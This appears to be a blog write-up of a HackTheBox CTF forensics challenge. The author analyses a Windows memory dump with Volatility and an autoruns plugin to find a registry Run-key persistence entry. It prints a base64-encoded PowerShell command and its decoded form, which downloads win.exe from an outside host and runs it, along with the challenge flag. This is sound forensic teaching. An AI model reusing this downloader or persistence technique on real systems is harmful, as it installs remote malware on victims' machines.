Event: Cyber Santa is Coming to Town – 2021 HackTheBox
Category: Forensics
PTS: 300
Description:
Although Santa just updated his infra, problems still occur. He keeps complaining about slow boot time and a blue window popping up for a split second during startup. The IT elves support suggested that he should restart his computer. Ah, classic IT support!
Inside the zip file there’s a .raw file, the same thing that we’ve seen previously in the honeypot challenge so let’s roll with the same modus operandi
volatility -f ./persist.raw imageinfo
Volatility Foundation Volatility Framework 2.6
INFO : volatility.debug : Determining profile based on KDBG search...
Suggested Profile(s) : Win7SP1x86_23418, Win7SP0x86, Win7SP1x86
AS Layer1 : IA32PagedMemoryPae (Kernel AS)
AS Layer2 : FileAddressSpace (/home/grizzly/codice/hacking/ctf/cyber_santa_is_coming_htb/forensics_persist/persist.raw)
PAE type : PAE
DTB : 0x185000L
KDBG : 0x82977c68L
Number of Processors : 1
Image Type (Service Pack) : 1
KPCR for CPU 0 : 0x82978d00L
KUSER_SHARED_DATA : 0xffdf0000L
Image date and time : 2021-11-30 22:05:35 UTC+0000
Image local date and time : 2021-11-30 14:05:35 -0800We know that we’re dealing with an OS dump and we’re looking for something that appears at the boot, probably a Powershell script (from the blue of the pop up window) but there’s no default modules for helping us with that type of research, maybe the community already faced this type of problem, let’s check the internet.
http://tomchop.me/2014/09/18/volatility-autoruns/
They did, using this simple plugin following the instruction on the website this should be your command – or at least similar – :
volatility --plugins=volatility-autoruns/ --profile=Win7SP1x86_23418 -f ./persist.raw --plugins=volatility-autoruns/ autoruns
As you can see we have something called by powershell under the ntuser.dat HIVE:
Hive: \??\C:\Users\Santa\ntuser.dat
Software\Microsoft\Windows\CurrentVersion\Run (Last modified: 2021-11-30 22:04:29 UTC+0000)
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -enc JABQAGEAdABoACAAPQAgACcAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAdwBpAG4AZABvAHcAcwBcAHcAaQBuAC4AZQB4AGUAJwA7AGkAZgAgACgALQBOAE8AVAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAJABQAGEAdABoACAALQBQAGEAdABoAFQAeQBwAGUAIABMAGUAYQBmACkAKQB7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAkAFAAYQB0AGgAfQBlAGwAcwBlAHsAbQBrAGQAaQByACAAJwBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXAB3AGkAbgBkAG8AdwBzACcAOwAkAGYAbABhAGcAIAA9ACAAIgBIAFQAQgB7AFQAaAAzAHMAMwBfADMAbAB2ADMAcwBfADQAcgAzAF8AcgAzADQAbABsAHkAXwBtADQAbAAxAGMAMQAwAHUAcwB9ACIAOwBpAGUAeAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAiAGgAdAB0AHAAcwA6AC8ALwB3AGkAbgBkAG8AdwBzAGwAaQB2AGUAdQBwAGQAYQB0AGUAcgAuAGMAbwBtAC8AdwBpAG4ALgBlAHgAZQAiACwAJABQAGEAdABoACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABQAGEAdABoAH0AJQA=It’s obviously a base64 encoded script, decoding it will produce the following output:
$.P.a.t.h. .=. .'.C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.w.i.n.d.o.w.s.\.w.i.n...e.x.e.'.;.i.f. .(.-.N.O.T.(.T.e.s.t.-.P.a.t.h. .-.P.a.t.h. .$.P.a.t.h. .-.P.a.t.h.T.y.p.e. .L.e.a.f.).).{.S.t.a.r.t.-.P.r.o.c.e.s.s. .$.P.a.t.h.}.e.l.s.e.{.m.k.d.i.r. .'.C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.w.i.n.d.o.w.s.'.;.$.f.l.a.g. .=. .".H.T.B.{.T.h.3.s.3._.3.l.v.3.s._.4.r.3._.r.3.4.l.l.y._.m.4.l.1.c.1.0.u.s.}.".;.i.e.x. .(.N.e.w.-.O.b.j.e.c.t. .S.y.s.t.e.m...N.e.t...W.e.b.C.l.i.e.n.t.)...D.o.w.n.l.o.a.d.F.i.l.e.(.".h.t.t.p.s.:././.w.i.n.d.o.w.s.l.i.v.e.u.p.d.a.t.e.r...c.o.m./.w.i.n...e.x.e.".,.$.P.a.t.h.).;.S.t.a.r.t.-.P.r.o.c.e.s.s. .$.P.a.t.h.}.%.Which cleaned out looks like this:
$Path = 'C:\ProgramData\windows\win.exe';if (-NOT(Test-Path -Path $Path -PathType Leaf)){Start-Process $Path}else{mkdir 'C:\ProgramData\windows';$flag = "HTB{Th3s3_3lv3s_4r3_r34lly_m4l1c10us}";iex (New-Object System.Net.WebClient).DownloadFile("https://windowsliveupdater.com/win.exe",$Path);Start-Process $Path}%With our flag in clear.
This was pretty smooth thanks to the time used on the honeypot challenge, we came in strong from that.